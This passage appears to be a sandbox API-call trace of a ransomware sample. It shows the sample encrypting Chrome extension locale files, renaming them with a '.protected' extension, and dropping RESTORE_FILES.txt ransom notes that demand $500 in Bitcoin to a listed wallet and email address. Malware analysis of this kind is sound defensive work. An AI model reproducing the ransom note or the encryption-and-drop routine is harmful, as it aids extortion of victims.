dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.396] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.396] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.397] lstrlenA (lpString="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") returned 684 [0080.397] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, 
lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.397] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.397] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.397] CloseHandle (hObject=0x164) returned 1 [0080.398] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.398] lstrcmpiW (lpString1="el", lpString2="Windows") returned -1 [0080.398] lstrcmpiW (lpString1="el", lpString2="Program Files") returned -1 [0080.398] lstrcmpiW (lpString1="el", lpString2="Program Files (x86)") returned -1 [0080.398] lstrcmpiW (lpString1="el", lpString2="$Recycle.bin") returned 1 [0080.398] lstrcmpiW (lpString1="el", lpString2="System Volume Information") returned -1 [0080.398] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el") returned 141 [0080.398] lstrcmpW (lpString1="el", lpString2=".") returned 1 [0080.398] lstrcmpW (lpString1="el", lpString2="..") returned 1 [0080.398] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\*") returned 143 [0080.398] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.399] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.399] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.399] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.399] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.399] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.399] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\.") returned 143 [0080.399] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.399] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.399] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.400] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.400] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.400] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.400] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.400] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\..") returned 144 [0080.400] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.400] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.400] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.400] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 
[0080.400] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.400] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.400] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.400] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.400] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json") returned 155 [0080.400] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.400] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.400] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.400] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.400] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.401] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json") returned 155 [0080.401] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.401] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json") returned 155 [0080.401] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.401] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json") returned 155 [0080.401] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.401] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x12a, lpOverlapped=0x0) returned 1 [0080.404] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffed6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.404] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x12a, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x12a, lpOverlapped=0x0) returned 1 [0080.404] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.404] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.404] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.404] CloseHandle (hObject=0x168) returned 1 [0080.405] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json.protected") returned 165 [0080.405] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json.protected")) returned 1 [0080.406] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.406] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.406] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\RESTORE_FILES.txt") returned 159 [0080.406] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0x164 [0080.407] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.407] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.408] lstrlenA (lpString="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") returned 684 [0080.408] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, 
lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.408] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.408] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.408] CloseHandle (hObject=0x164) returned 1 [0080.408] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.408] lstrcmpiW (lpString1="en_GB", lpString2="Windows") returned -1 [0080.408] lstrcmpiW (lpString1="en_GB", lpString2="Program Files") returned -1 [0080.409] lstrcmpiW (lpString1="en_GB", lpString2="Program Files (x86)") returned -1 [0080.409] lstrcmpiW (lpString1="en_GB", lpString2="$Recycle.bin") returned 1 [0080.409] lstrcmpiW (lpString1="en_GB", lpString2="System Volume Information") returned -1 [0080.409] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB") returned 144 [0080.409] lstrcmpW (lpString1="en_GB", lpString2=".") returned 1 [0080.409] lstrcmpW (lpString1="en_GB", lpString2="..") returned 1 [0080.409] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\*") returned 146 [0080.409] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\*", 
lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.409] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.409] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.409] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.409] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.409] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.409] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\.") returned 146 [0080.409] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.409] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.409] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.409] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.409] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.409] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.410] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.410] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\..") returned 147 [0080.410] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.410] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.410] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.410] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.410] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned 
-1 [0080.410] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.410] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.410] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.410] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\messages.json") returned 158 [0080.410] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.410] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.410] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.410] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.410] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_gb\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.411] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\messages.json") returned 158 [0080.411] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.411] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\messages.json") returned 158 [0080.411] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.411] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\messages.json") returned 158 [0080.411] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.411] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb2, lpOverlapped=0x0) returned 1 [0080.412] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.412] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb2, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb2, lpOverlapped=0x0) returned 1 [0080.412] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.413] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.414] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.414] CloseHandle (hObject=0x168) returned 1 [0080.414] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\messages.json.protected") returned 168 [0080.415] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_gb\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_gb\\messages.json.protected")) returned 1 [0080.415] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.416] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.416] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\RESTORE_FILES.txt") returned 162 [0080.416] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_gb\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 
[0080.416] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.417] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.418] lstrlenA (lpString="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") returned 684 [0080.418] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
